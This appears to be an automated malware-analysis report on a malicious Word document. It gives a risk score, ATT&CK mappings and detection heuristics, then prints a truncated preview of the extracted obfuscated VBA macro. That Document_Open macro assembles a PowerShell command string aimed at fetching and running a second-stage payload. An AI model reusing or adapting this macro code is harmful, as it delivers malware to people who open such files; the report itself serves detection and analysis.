MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function to execute arbitrary code. This indicates an attempt to download and execute a second-stage payload. The ClamAV detection 'Doc.Malware.Valyria-6874635-0' further supports its malicious nature. The embedded URL, though benign, is noted.
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-6874635-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6874635-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 37369 bytes |
SHA-256: 25186a0c259c9cda7e1c3a7a62f78812e95f44fac8a4d50c858462071c5a9585 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "pFfKJJJJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
JhWon = 68574 - bjnSd * 87135 - 28607 * (EcQffc + bIFhAq * vsOlV / 14826 - 24044 / KKHGS)
msjqoN = 53582 - nwmSG * 28128 - 66296 * (jTZnv + rYHRo * FXZKB / 61856 - 42211 / wJBoT)
zzrcfY = 83579 - OWvWPK * 25475 - 53090 * (FJUzL + NjQunw * rQuYjF / 42055 - 54449 / TSDTS)
vPkKR = 88061 - HSBnX * 20168 - 27968 * (jiufd + ECSKSm * PSHSap / 92761 - 94289 / wGmEzi)
iWfnOn = 45226 - KkrMSz * 97569 - 14095 * (rAtUz + STBln * YjZGmb / 92466 - 14060 / BfkmQF)
lUGdC = 79178 - LmqBz * 74290 - 33710 * (joNoZi + JrMSH * jJGzz / 38936 - 12824 / tEzVRL)
RsOphXcFS = Application.Run("HtfwfZzt", "" + jpGBbEYmsBAhA + WZKzPXcRZsUG + uvSRq + LdQRMubi + wHfkHiCLl + TMBjnlAR)
aNDazY = 41234 - FhIFt * 2298 - 84194 * (jCLYG + PbhaL * KzkHut / 28147 - 30897 / XjfSai)
ZTPRkt = 5672 - adZzbt * 44602 - 24843 * (sHwAKA + bLLVfG * WYiIHv / 39991 - 50751 / hjTQp)
XCAXqV = 18348 - jPNjlo * 62106 - 25211 * (cvDapu + dpdAwi * odkZE / 60180 - 25455 / JtdFm)
End Sub
Attribute VB_Name = "iJSjhXuvOT"
Function uvSRq()
On Error Resume Next
wjbrEm = 53734 * 61438 / 79346 / TpcYp - 36625 - 52043 * 88835 * GMrlpk / CIKnYi - 9443 - zHimSI - 11004
CIRDH = TqHjD / woGiXu + (phQThZ / vICiB)
JqGwfVwzR = "" + zszjFpboBsZGul + jTVBuokmYho + Chr(112) + rACzoprhWCU + dMPsNtisYloq + "o" + HKHYBnNK + GGvPtMRAqJ + "w" + WfUuKiSOOJ + kWOdTYXSUrm + "e" + OzMTnztAjnbEGc + dJwVRfWwohRms + "r" + tNwvjGuaKqd + nZMvsariplfj + "s" + fGhGHjIiq + vliimioioKPV + "h" + RLwEcQMGsPUckV + FiCOzpJzCG + "e" + oDQkLMq + dOtVpsSN + "l" + SJOFjSIzcCwBWZ + pzjQXfANb + "l" + sIzqlsLZ + zjSDPORPbrU + " " + DTitXmJAiM + pfLKJLzMr + " " + RMIRizzco + tXHwnmlZTWIo + Chr(40) + GFSjUBfLDMhO + DikVlElnCKX + "N"
zKzpBI = 99238 * 4469 / 37898 / twwPw - 69689 - 12781 * 44112 * MkJqZ / MBrwJs - 17610 - iNLrwl - 89647
SYsJYi = 66207 * 54830 / 85747 / vTcEiU - 91266 - 33715 * 48283 * LWomm / VzSCH - 18599 - bNmKC - 16111
QLKVjLqGaV = "" + vOLKLRBEfmTCnU + oGIFKOk + "E" + CksJlaqoL + ZCpavFMW + "w" + ZrUtwnNqoji + JjJuuLcNcZMdm + "-" + KEBNjqctYQpn + WOhTJjtlLSKvOw + "O" + PJWjfjiQ + hmkdEYz + "B" + KiJdknY + DkcfbQBfQwTn + "j" + uIzHBhNlv + HdFjlsHpvNoYB + "E" + cZHCvSaOPV + XMVRpdpUmvw + "c" + MzpDGjz + EodsEXjPqLz + "t" + cZvzvMphjadw + lKIlojrHhn + " " + RoXFnfscUP + nlGwXNAu + "S" + vFhZLcs + IDWuBKbnwFGAV + "y"
BRfIr = 6596 * 50100 / 59008 / WBwDzh - 22504 - 45200 * 7834 * sjMqNT / slKRj - 28043 - dCzLww - 86282
wCcsk = 36842 * 73943 / 2873 / PsSYN - 37298 - 31797 * 69299 * XzERqF / waCpOB - 49564 - fbJzA - 71065
OAFsBjTCp = "" + rAbzhuzbwzjmpb + bKoUXmmzavhAa + "S" + sLMwNrQLrMpnRR + XsHUiMDcE + "T" + ZmMwBoCoacc + LzwHiwVhjiJHTm + "E" + HkuzPrZiQoz + PkunJJiPwtF + "m" + pDCphBpITsiFiT + ruzGETzOT + "." + iQLqoHVBVba + ZUwsMiapHzFzGm + "I" + GnVWXLsHBu + RFqQnBjk + "O" + CljnWSG + UjfOnFjZObpr + "." + NYCGoMEGEzBl + koZBJMijmqDLD + "c" + IhNlCWPTM + dObfNCVwpaB + "o" + FFhlLDdIdowS + hRUUNji + "m" + FHdApGmrH + fzpiHIoWzZf + "P" + CofUFnECVpb + CnCrzoYGUkcq + "r"
YHKQsB = (siRVE + YbonEj * HKmTd * ooEmRk * (ukUEa / 90981 - jvswNB * rWizpB + 35887 * OVrmwN - 50773 * wAkBvn))
vHjpZ = (CwBaRm + pdKHN * YFAUI * qoTiDD * (siIulz / 4448 - jElbZL * jdJcO + 81781 * zunbNi - 11696 * QzWntk))
HQBhtEzAQi = "" + IlhLSqFcC + WmbjkTWwM + "e" + kFHvvczwDPzmjP + wflKtQIRJ + "S" + RcRHXZJ + EWuddEsBYAu + "S" + DZTbdFUzqlXbhW + aNXOJLal + "i" + pXHsJihSYsow + jiOkXBv + "o" + twnXEprz + wPwpzcstP + "N" + TdRSiizpOGlHQN + HccjtGdwpj + "." + IiIjkNZUV + LuJTMLHfcD + "D" + QmQANASdwqjh + FXDnZBCGRmjmRn + "E" + MMDtrtT + UDbXUOck + "F" + jboiEjK + QajiwudTiqH + "L" + qaFwaiw + CDizcXiw + "a" + ZovmkYfcruz + tflNZGI + "T" + GJXjwwSGlf + mQuoUZvGFdJ + "e" + pSrJIsCEBhmOEc + kISNfGOq + "S"
jMVSc = (OiHfbw + miWliI * QzOvU * rwRiD * (kEMpj
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.